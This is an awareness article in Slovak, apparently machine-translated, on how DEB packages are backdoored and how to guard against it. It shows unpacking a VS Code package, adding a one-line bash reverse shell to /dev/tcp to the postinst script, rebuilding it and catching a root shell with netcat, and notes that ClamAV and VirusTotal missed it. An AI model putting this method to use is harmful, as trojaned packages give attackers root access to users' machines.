Vedeli ste, že útočníci môžu upraviť skripty zabalené v súbore DEB, aby získali neoprávnený prístup k vášmu počítaču? Tu je návod, ako sú balíčky DEB backdoored.
Kľúčové informácie
- Balíky DEB je možné jednoducho zakryť zadnými vrátkami, čo umožňuje útočníkom vložiť do vášho systému škodlivý kód, keď ich nainštalujete s oprávneniami root.
- Infikované balíky DEB je ťažké odhaliť, pretože nemusia byť označené antivírusovým softvérom alebo cloudovými riešeniami, ako je VirusTotal.
- Aby ste sa ochránili, vyhnite sa sťahovaniu balíkov DEB z náhodných stránok, držte sa oficiálnych stránok na sťahovanie resp lokality dôveryhodné pre komunitu a zvážte inštaláciu bezpečnostných nástrojov na zabezpečenie vášho systému Linux proti sieti útokov.
Súbory DEB sú softvérové balíky, ktoré sú primárnym formátom dodávaného softvéru v distribúciách Linuxu založených na Debiane.
Ak chcete nainštalovať balíky DEB, musíte použiť správcu balíkov ako dpkg s oprávneniami root. Útočníci to využívajú a vstrekujú do týchto balíkov zadné vrátka. Keď ich nainštalujete pomocou dpkg alebo iného správcu balíkov, škodlivý kód sa tiež spustí a ohrozí váš systém.
Poďme presne preskúmať, ako sú balíčky DEB backdoored a čo môžete urobiť, aby ste sa ochránili.
Ako sú balíčky DEB backdoored?
Predtým, ako pochopíte, ako sú balíky DEB backdoored, poďme preskúmať, čo je vo vnútri balíka DEB. Na ukážku si stiahnem balík Microsoft Visual Studio Code DEB z oficiálnej webovej stránky Microsoftu. Toto je rovnaký balík, ktorý by ste si stiahli, ak chcete nainštalovať kód VS na Linux.
Stiahnuť ▼:Kód Visual Studio
Teraz, keď máte stiahnutý cieľový balík, je čas ho rozbaliť. Balík DEB môžete rozbaliť pomocou dpkg-deb príkaz s -R príznak, za ktorým nasleduje cesta na uloženie obsahu:
dpkg-deb -R Toto by malo extrahovať obsah balíka VS Code.
Presunutím do priečinka nájdete viacero adresárov, náš záujem však spočíva iba v DEBIAN adresár. Tento adresár obsahuje skripty správcu, ktoré sa spúšťajú počas inštalácie s oprávneniami root. Ako ste už možno zistili, útočníci upravujú skripty v tomto adresári.
Pre ukážku upravím postinst skript a pridajte jednoduchý jednoriadkový Bash reverzný TCP shell. Ako už názov napovedá, ide o skript, ktorý sa spustí po nainštalovaní balíka do systému.
Obsahuje príkazy, ktoré finalizujú konfigurácie, ako je nastavenie symbolických odkazov, spracovanie závislostí a ďalšie. Na internete nájdete tony rôznych reverzných mušlí. Väčšina z nich bude fungovať rovnako. Tu je vzorový jednovrstvový reverzný plášť:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1Vysvetlenie príkazu:
- bash: Toto je príkaz, ktorý vyvolá shell Bash.
- -i: Príznak hovorí Bashovi, aby bežal v interaktívnom režime, ktorý umožňuje I/O príkazov v reálnom čase.
-
>& /dev/tcp/ip/port: Toto presmeruje štandardný výstup a štandardná chyba do sieťového soketu, čím sa v podstate vytvorí TCP spojenie s
a . - 0>&1: Toto presmeruje vstup a výstup na rovnaké miesto, t. j. do sieťovej zásuvky.
Pre nezasvätených je reverzný shell typ kódu, ktorý po spustení na cieľovom počítači iniciuje spojenie späť so strojom útočníka. Reverzné shelly sú skvelým spôsobom, ako obísť obmedzenia brány firewall, pretože prevádzka sa generuje zo stroja za bránou firewall.
Takto upravený skript vyzerá:
Ako vidíte, všetko je rovnaké, ale bol pridaný iba jeden riadok, t. j. náš reverzný shell Bash. Teraz musíte zostaviť súbory späť do súboru ".deb“. Jednoducho použite dpkg príkaz s -- stavať vlajka alebo použitie dpkg-deb s -b príznak, za ktorým nasleduje cesta extrahovaného obsahu:
dpkg --build
dpkg-deb -b Teraz je balík DEB so zadnými vrátkami pripravený na odoslanie na škodlivé stránky. Simulujme scenár, kde si obeť stiahla balík DEB do svojho systému a inštaluje ho ako ktorýkoľvek iný bežný balík.
Horný panel terminálu je pre POV obete a spodný je POV útočníka. Obeť inštaluje balík s sudo dpkg -i a útočník trpezlivo počúva prichádzajúce spojenia pomocou netcat príkaz v systéme Linux.
Hneď po dokončení inštalácie si všimnite, že útočník získa spätné pripojenie shellu a teraz má root prístup k systému obete. Teraz viete, ako sú balíčky DEB backdoored. Poďme sa teraz naučiť, ako sa môžete chrániť.
Ako zistiť, či je balík DEB škodlivý
Teraz, keď viete, že infikované balíky DEB sú vecou, musíte sa pýtať, ako nájsť infikované. Na začiatok môžete skúsiť použiť a Linuxový antivírusový softvér ako ClamAV. Bohužiaľ, keď bola spustená kontrola ClamAV na balíku, neoznačila ho ako škodlivý. Tu je výsledok skenovania:
Pokiaľ teda nemáte zavedené prémiové antivírusové riešenie (čo nie je zárukou, že vás nenapadnú hackeri), je dosť ťažké odhaliť škodlivé DEB balíčky. Skúsme použiť cloudové riešenie, ako je webová stránka VirusTotal:
Ako vidíte, VirusTotal v ňom nezistil nič zlé. Jediný spôsob, ako sa chrániť pred takýmito hrozbami, je dodržiavať základnú bezpečnostnú hygienu, ako je nesťahovanie súborov z neznámych zdrojov, vždy kontrola hash súborua vo všeobecnosti sa vyhýbajte inštalácii pochybného softvéru.
Internet je plný takýchto hrozieb. Jediný spôsob, ako surfovať bez straty dát, je mať rozum a prehliadať dôveryhodné stránky. Okrem toho v systéme Linux by ste sa mali tiež pokúsiť zistiť, či softvér, ktorý sťahujete, má príponu Variant AppImage keďže sú samostatné a možno ich umiestniť do karantény, a teda držať mimo kontaktu s vaším systémom.
Nesťahujte balíky DEB z náhodných stránok!
Balíky DEB nie sú vo svojej podstate zlé, avšak útočníci ich môžu ľahko použiť ako zbrane a poslať ich nič netušiacim používateľom. Ako bolo demonštrované, balík DEB možno ľahko otvoriť a upraviť tak, aby sa pridal vlastný kód iba pomocou niekoľkých príkazov, čo z neho robí bežný vektor na odosielanie škodlivého softvéru.
Špičkové antivírusové riešenia nezachytia ani jednoduché zadné vrátka na balíkoch DEB. Takže najlepšie, čo urobíte, je hrať na istotu, pri surfovaní na webe sa držať zdravého rozumu a vždy sťahovať softvér iba z oficiálnych stránok na sťahovanie alebo z dôveryhodných stránok komunity.
Teraz, keď ste si vedomí bezpečnostných rizík, ktoré prináša inštalácia balíkov DEB z nových alebo neznámych stránok, mali by ste byť pri inštalácii nového softvéru opatrní. Nestačí však len dávať pozor na to, čo inštalujete. Aj váš systém Linux môže byť terčom sieťových útokov.
Aby ste sa uistili, že ste v bezpečí v prípade sieťového útoku, mali by ste zvážiť inštaláciu nástrojov zabezpečenia siete.
